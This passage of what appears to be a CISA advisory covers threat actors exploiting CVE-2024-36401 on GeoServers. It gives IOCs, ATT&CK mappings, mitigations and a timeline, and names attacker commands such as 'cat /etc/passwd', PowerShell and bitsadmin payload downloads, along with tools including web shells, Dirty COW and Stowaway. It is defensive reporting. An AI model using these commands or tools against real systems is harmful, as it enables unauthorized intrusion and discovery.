alert from GeoServer 1 where the EDR detected the Stowaway tool. The Web Server lacked endpoint protection. Indicators of Compromise See Table 1 for IOCs associated with this activity. Disclaimer: The IP addresses in this advisory were observed in August 2024, and some may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors. Table 1. IOCs IOC Type Date Description 45.32.22[.]62 IPv4 Mid-July to early August 2024 C2 Server IP Address 45.17.43[.]250 IPv4 Mid-July to early August 2024 C2 Server IP Address 0777EA1D01DAD6DC261A6B602205E2C8 MD5 Mid-July to early August 2024 China Chopper Web Shell feda15d3509b210cb05eacc22485a78c MD5 Mid-July to early August 2024 Generic PHP Web Shell C9F4C41C195B25675BFA860EB9B45945 MD5 Mid-July to early August 2024 Linux Exploit CVE-2016-5195 B7B3647E06F23B9E83D0B1CCE3E71642 MD5 Mid-July to early August 2024 Dirtycow 64e3a3458b3286caaac821c343d4b208 MD5 Mid-July to early August 2024 Stowaway Proxy Tool 20b70dac937377b6d0699a44721acd80 MD5 Mid-July to early August 2024 Unknown Downloaded Executable de778443619f37e2224898a9a800fa78 MD5 Mid-July to early August 2024 Unknown Downloaded Executable MITRE ATT&CK Tactics and Techniques See Table 2 through Table 11 for all referenced threat actor tactics and techniques. Table 2. Reconnaissance Technique Title ID Use Active Scanning: Vulnerability Scanning T1595.002 The cyber threat actors performed active scanning to identify vulnerabilities they could use for initial access. Table 3. Resource Development Technique Title ID Use Acquire Infrastructure: Virtual Private Server T1583.003 The cyber threat actors gained remote access to the victim’s network using a desktop behind a virtual private server (VPS). Table 4. Initial Access Technique Title ID Use Exploit Public-Facing Application T1190 The cyber threat actors exploited CVE 2024-36401 on two of the organization’s public-facing GeoServers. Table 5. Execution Technique Title ID Use Command and Scripting Interpreter: PowerShell T1059.001 The cyber threat actors used PowerShell to download a payload. Table 6. Defense Evasion Technique Title ID Use Indirect Command Execution T1202 The cyber threat actors employed indirect command execution via web shells. Table 7. Persistence Technique Title ID Use BITS Jobs T1197 The cyber threat actors abused BITS jobs. Scheduled Task/Job: Cron T1053.003 The cyber threat actors established persistence through cron jobs. Server Software Component: Web Shell T1505.003 The cyber threat actors uploaded web shells for persistence. Valid Accounts T1078 The cyber threat actors used valid accounts for persistence. Table 8. Privilege Escalation Technique Title ID Use Exploitation for Privilege Escalation T1068 The cyber threat actors attempted to exploit CVE-2016-5195 to escalate privileges. Table 9. Credential Access Technique Title ID Use Brute Force T1110 The cyber threat actors used brute force techniques to obtain login credentials for web services. Table 10. Discovery Technique Title ID Use Account Discovery: Local Account T1087.001 The cyber threat actors used cat /etc/passwd to discover local users. File and Directory Discovery T1083 The cyber threat actors used dir c:\, dir d:\, dir e:\, and type c:\ commands to identify files and directories on the SQL server. Network Service Discovery T1046 The cyber threat actors used fscan to identify SSH listeners and FTP servers. Process Discovery T1057 The cyber threat actors used tasklist on the SQL server. Remote System Discovery T1018 The cyber threat actors performed ping sweeps of hosts within specific subnets. System Information Discovery T1082 The cyber threat actors used cat /etc/redhat-release and cat /etc/os-release commands to get Red Hat Enterprise Linux (RHEL) and Linux operating system information. System Network Configuration Discovery T1016 The cyber threat actors used ipconfig to check GeoServer 1’s and the SQL server’s network configurations. System Network Connections Discovery T1049 The cyber threat actors executed commands such as netstat to obtain a listing of network connections to or from the systems they compromised. System Owner/User Discovery T1033 The cyber threat actors used whoami on the SQL server. Table 11. Command and Control Technique Title ID Use Ingress Tool Transfer T1105 The cyber threat actors used PowerShell and bitsadmin getfile to download payloads. Proxy T1090 The cyber threat actors used a connection proxy to direct traffic from their C2 server. Mitigations CISA recommends organizations implement the mitigations below to improve cybersecurity posture based on lessons learned from the engagement. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections. Establish a vulnerability management plan that includes procedures for prioritization and emergency patching. Prioritize patching of known exploited vulnerabilities listed in the KEV catalog. CISA urges organizations to address KEV catalog vulnerabilities immediately. Prioritize patching vulnerabilities in high-risk systems, including public facing systems as they are attractive targets for threat actors. Ensure high-risk systems are identified and prioritized for rapid patching by implementing asset management practices and conducting an asset inventory. Continuously discover and validate internet-facing assets through automated asset management and scanning (e.g., attack surface management tools, vulnerability scanners). Consider using a configuration management database (CMDB) with discovery and vulnerability tools to enrich asset context and support automated prioritization. Form a dedicated team responsible for assessing and implementing emergency patches, this team should include representatives from IT, security, and relevant business units. Maintain, practice, and update cybersecurity IRPs [CPG 2.S, 5.A]. Prepare a written IRP policy and IRP with senior leadership support. The policy should identify purpose and objectives, what constitutes an incident, prioritization or severity ratings of incidents, clear escalation procedures, IR personnel, and plans for notification, interaction and information sharing with media, law enforcement, and partners. The IRP should identify: Key personnel with knowledge of the network Key resources and courses of action (COAs) for containment and eradication in the event of compromise. Procedures for granting third parties prompt access to networks and security tools. This should include processes for expediating deployment of EDR and other security tools through change control boards (CCBs). The IRP should include procedures for establishing out-of-band communications systems and accounts in case primary systems are compromised or not available (such as with ransomware incidents). Periodically test the IRP under real-world conditions, such as via purple team engagements and tabletop exercises. During the test, include engagement with third party incident responders and external EDR agents and other tools. Following the test, update the IRP as necessary. See CISA’s Tabletop Exercise Packages for resources designed to assist organizations with conducting their own exercises. For more information on IRPs, see the National Institute of Science and Technology’s (NIST’s) SP 800-61 Rev. 3, Incident Response Recommendations and Considerations for Cybersecurity Risk Management: A CSF 2.0 Community Profile. Implement comprehensive (i.e., large coverage) and verbose (i.e., detailed) logging and aggregate logs in an out-of-band, centralized location. Prepare SOCs with sufficient resources to monitor collected logs and responses to malicious cyber threat activity. Consider using a SIEM solution for log aggregation and management. Identify, alert on, and investigate abnormal network activity (as threat actor activity generates unusual network traffic across all phases of the attack chain). Abnormal activity to look for includes: Running scans to discover other network connected devices. Running commands to list, add, or alter administrator accounts. Using PowerShell to download and execute remote programs. Running scripts not usually seen on a network. For additional information, see joint guide Identifying and Mitigating Living off the Land Techniques, which provides prioritized detection recommendations that enable behavior analytics, anomaly detection, and proactive hunting. In addition to the above, CISA recommends organizations implement the following mitigations based on threat actor activity: Require phishing-resistant MFA for access to all privileged accounts and email services accounts [CPG 2.H]. Implement allowlisting for applications, scripts, and network traffic to prevent unauthorized execution and access. Validate Security Controls In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK Matrix for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (see Table 3 through Table 11). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. Resources Incident Response Plan (IRP) Basics Identifying and Mitigating Living Off the Land Techniques Phishing-Resistant Multi-Factor Authentication (MFA) Success Story: USDA’s Fast IDentity Online (FIDO) Implementation Disclaimer The information in this report is being provided “as is” for informational purposes only. CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA. Version History September 23, 2025: Initial version. Apendix: Key Events Timeline Date/Time Relevant Host Event July 1, 2024 n/a CVE-2024-36401 published. July 11, 2024 GeoServer 1 Initial Access to GeoServer 1. July 15, 2024 n/a CVE-2024-36401 added to CISA’s Known Exploited Vulnerabilities Catalog. July 15, 2024 GeoServer 1 EDR detects Stowaway tool on GeoServer 1. July 24, 2024 GeoServer 2 Initial Access to GeoServer 2. July 31, 2024 Web Server Initial Access to Web Server. July 31, 2024 SQL Server Initial Access to SQL Server. Aug. 1, 2024 SQL Server, GeoServer 1 Organization observes SQL Alert and contains SQL Server and GeoServer 1. Aug. 1, 2024 n/a The impacted organization requested assistance from CISA. Aug. 5, 2024 n/a CISA began forensic artifact analysis. Aug. 6, 2024 GeoServer 2 Last observed threat actors’ activity—discovery commands on GeoServer 2. Aug. 8 – Sept. 3, 2024 n/a CISA conducted their full incident response. Notes [1] “GeoServer/GeoServer,” GitHub, published July 1, 2024, https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w. [2] “firefart/dirtycow,” GitHub, last modified 2021, https://github.com/firefart/dirtycow. [3] “T4y1oR/RingQ” GitHub, last modified February 19, 2025. https://github.com/T4y1oR/RingQ. [4] “shadow1ng/fscan,” GitHub, last modified July 2025, https://github.com/shadow1ng/fscan. [5] “ph4ntonn/Stowaway,” GitHub, last modified April 2025, https://github.com/ph4ntonn/Stowaway.